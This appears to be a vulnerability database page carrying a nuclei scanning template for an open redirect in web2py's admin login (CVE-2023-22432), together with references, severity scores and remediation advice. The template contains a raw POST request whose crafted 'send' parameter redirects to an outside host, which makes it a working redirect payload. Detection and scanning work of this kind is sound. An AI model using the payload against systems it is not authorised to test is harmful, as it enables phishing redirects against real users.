Lucene search
K

Web2py URL - Open Redirect

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Web2py open redirect CVE-2023-2243

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Open Redirect in Web2Py
6 Mar 202304:43
githubexploit
Circl
CVE-2023-22432
6 Mar 202302:37
circl
CNNVD
web2py 输入验证错误漏洞
28 Feb 202300:00
cnnvd
CVE
CVE-2023-22432
5 Mar 202300:00
cve
Cvelist
CVE-2023-22432
5 Mar 202300:00
cvelist
Github Security Blog
Open redirect in web2py
6 Mar 202300:30
github
Japan Vulnerability Notes
JVN#78253670: web2py development tool vulnerable to open redirect
28 Feb 202300:00
jvn
Japan Vulnerability Notes
web2py development tool vulnerable to open redirect
28 Feb 202306:00
jvn
NVD
CVE-2023-22432
6 Mar 202300:15
nvd
OSV
GHSA-W4R7-VM83-Q2C7 Open redirect in web2py
6 Mar 202300:30
osv
Rows per page
id: CVE-2023-22432

info:
  name: Web2py URL - Open Redirect
  author: DhiyaneshDK
  severity: medium
  description: |
    Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.
  impact: |
    Authenticated attackers can exploit open redirect through the send parameter to redirect users to malicious websites for phishing attacks.
  remediation: |
    Update to web2py 2.23.1 or higher.
  reference:
    - https://github.com/aeyesec/CVE-2023-22432
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22432
    - https://jvn.jp/en/jp/JVN78253670/
    - http://web2py.com/
    - http://web2py.com/init/default/download
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-22432
    cwe-id: CWE-601
    epss-score: 0.02382
    epss-percentile: 0.81869
    cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: web2py
    product: web2py
    shodan-query: http.favicon.hash:-1680052984
    fofa-query: icon_hash=-1680052984
  tags: cve,cve2023,web2py,redirect,authenticated,vuln

http:
  - raw:
      - |
        POST /admin/default/index HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        password={{password}}&send=%5C%2F%5C%2Foast.pro&login=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'a href="\/\/oast.pro"'

      - type: word
        part: location
        words:
          - '\/\/oast.pro'

      - type: status
        status:
          - 303
# digest: 4a0a00473045022100e601ccb9f50f753088f56d73ed06ad0e984725f7121c7362f436bddffd92def10220389da905905087c5e742fcfcd52569e5937de1f30c1d1b49cc77cc83dd249526:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1
EPSS0.02382
SSVC
19